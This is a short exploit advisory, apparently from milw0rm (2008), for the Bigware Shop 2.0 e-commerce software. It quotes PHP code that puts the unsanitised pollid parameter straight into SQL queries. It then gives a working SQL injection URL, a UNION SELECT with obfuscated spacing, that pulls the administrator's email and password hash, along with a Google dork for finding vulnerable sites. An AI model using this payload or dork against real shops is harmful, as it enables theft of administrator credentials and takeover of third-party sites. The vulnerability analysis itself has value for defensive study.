###########################
###Bigware Shop 2.0########
#####################################################################
# Bug found by D4m14n
# Vendor: http://www.bigware.de/
# Vuln. Version: 2.0 (prior versions also may be affected)
# Email: delta-1@secure-mail.net
#
# GoogleDork: "Diese Shopsoftware wurde entwickelt von Bigware"
#####################################################################
There's a SQL-Injection in "main_bigware_53.tpl.php"!
You can find more than this Injection in the Sourcecode (RFI,SQL-Injections).
#####################################################################
Sourcecode:
if (!isset($_GET['op'])) {
$_GET['op']="list";
}
switch ($_GET['op']) {
case "results":
if (isset($_GET['pollid'])) {
$pollid=$_GET['pollid'];
} else {
$pollid=1;
}
$poll_query = go_db_query("SELECT pollid, timeStamp FROM phesis_poll_desc WHERE pollid='".$pollid."'");
$polls = go_db_fetch_array($poll_query);
$title_query = go_db_query("select optionText from phesis_poll_data where pollid=$pollid and voteid='0' and language_id = '" . $languages_id . "'");
$title = go_db_fetch_array($title_query);
#####################################################################
Proof-of-Concept:
main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*
#####################################################################
You can see the Admins Email-Adress and his SALTED passwordhash (cracking this hash is very easy)
#####################################################################
If you are searching for a Coder, who searches Security-Holes in your Web-Applications,
feel free to contact me!
GreetZ 2 Shadowleet and some more ;)
PS: Immer wenn mir langweilig ist, dann veröffentliche ich Sicherheitslücken...
# milw0rm.com [2008-01-29]
